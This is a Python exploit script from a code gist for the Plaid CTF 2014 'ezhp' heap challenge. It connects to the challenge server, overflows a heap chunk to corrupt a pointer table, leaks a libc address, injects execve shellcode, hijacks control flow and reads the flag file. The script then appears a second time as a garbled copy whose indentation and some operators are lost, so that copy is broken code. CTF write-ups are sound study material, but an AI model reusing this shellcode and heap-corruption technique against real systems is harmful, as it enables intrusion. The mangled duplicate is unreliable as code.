eggpod/gist:10603611

## gistfile1.py
# Plaid CTF 2014 ezhp
from socket import *
import os,sys
from array import *
from struct import *

sock = None
f = None


def recvmenu():
	for i in range(7):
		f.readline()


def add(size):
	recvmenu()

	sock.sendall("1\n")
	f.readline()
	sock.sendall("%d\n" % size)


def remove(id):
	recvmenu()

	sock.sendall("2\n")
	f.readline()
	sock.sendall("%d\n" % id)

def change(id, data, size = None):
	recvmenu()

	size = len(data)

	sock.sendall("3\n")
	f.readline()
	sock.sendall("%d\n" % id)
	f.readline()
	sock.sendall("%d\n" % size)
	f.readline()
	sock.sendall(data)

def dump(id):
	recvmenu()

	sock.sendall("4\n")
	f.readline()
	sock.sendall("%d\n" % id)
	s = ""
	while 1:
		s += f.read(1)
		if s[-7:] == "\nPlease":
			break

	return s[0:-7]

def quit():
	print "QUIT"
	sock.sendall("0\n")

def main():
	global sock, f
	sock = socket(AF_INET,SOCK_STREAM)
	sock.settimeout(7)
	#sock.connect(("192.168.189.131" , 9174))
	sock.connect(("54.81.149.239" , 9174))
	f = sock.makefile()
	print "connected"
	size = 264
	datasize = size+12
	srbsize = size+32
	add(size)
	for i in range(63):
		print i,
		add(0)
	print ""

	table_count_addr = 0x0804A04C
	table_addr = 0x0804A060
	gotplt_addr=0x0804A000
	stdout_addr=0x0804A040

	change(0, "0"*datasize+pack("II", 1, table_count_addr))
	add(64-48)

	change(65, "\x00"*8+pack("II", stdout_addr, gotplt_addr+4))

	r = dump(0)
	stdout = unpack("I", r)[0]
	print hex(stdout)

	#
	buf =  ""
	buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
	buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08"
	buf += "\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53"
	buf += "\x89\xe1\xcd\x80\xCC"
	shellcode = buf

	change(65, "\x00"*8+pack("I", stdout+0x94)+(pack("I", table_addr+4*22)*21)+shellcode)
	change(0, pack("I", table_addr+4))


	import time
	time.sleep(1)
	sock.send("ls /home/ezhp -la; cat /home/ezhp/flag.txt;exit\n");
	print sock.recv(1024)
	print sock.recv(1024)
	print sock.recv(1024)

	# quit()

main()
#shitty_heap_allocators_are_shitty
	# Plaid CTF 2014 ezhp
	from socket import *
	import os,sys
	from array import *
	from struct import *

	sock = None
	f = None


	def recvmenu():
	for i in range(7):
	f.readline()


	def add(size):
	recvmenu()

	sock.sendall("1\n")
	f.readline()
	sock.sendall("%d\n" % size)


	def remove(id):
	recvmenu()

	sock.sendall("2\n")
	f.readline()
	sock.sendall("%d\n" % id)

	def change(id, data, size = None):
	recvmenu()

	size = len(data)

	sock.sendall("3\n")
	f.readline()
	sock.sendall("%d\n" % id)
	f.readline()
	sock.sendall("%d\n" % size)
	f.readline()
	sock.sendall(data)

	def dump(id):
	recvmenu()

	sock.sendall("4\n")
	f.readline()
	sock.sendall("%d\n" % id)
	s = ""
	while 1:
	s += f.read(1)
	if s[-7:] == "\nPlease":
	break

	return s[0:-7]

	def quit():
	print "QUIT"
	sock.sendall("0\n")

	def main():
	global sock, f
	sock = socket(AF_INET,SOCK_STREAM)
	sock.settimeout(7)
	#sock.connect(("192.168.189.131" , 9174))
	sock.connect(("54.81.149.239" , 9174))
	f = sock.makefile()
	print "connected"
	size = 264
	datasize = size+12
	srbsize = size+32
	add(size)
	for i in range(63):
	print i,
	add(0)
	print ""

	table_count_addr = 0x0804A04C
	table_addr = 0x0804A060
	gotplt_addr=0x0804A000
	stdout_addr=0x0804A040

	change(0, "0"*datasize+pack("II", 1, table_count_addr))
	add(64-48)

	change(65, "\x00"*8+pack("II", stdout_addr, gotplt_addr+4))

	r = dump(0)
	stdout = unpack("I", r)[0]
	print hex(stdout)

	#
	buf = ""
	buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
	buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08"
	buf += "\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53"
	buf += "\x89\xe1\xcd\x80\xCC"
	shellcode = buf

	change(65, "\x00"8+pack("I", stdout+0x94)+(pack("I", table_addr+422)*21)+shellcode)
	change(0, pack("I", table_addr+4))


	import time
	time.sleep(1)
	sock.send("ls /home/ezhp -la; cat /home/ezhp/flag.txt;exit\n");
	print sock.recv(1024)
	print sock.recv(1024)
	print sock.recv(1024)

	# quit()

	main()
	#shitty_heap_allocators_are_shitty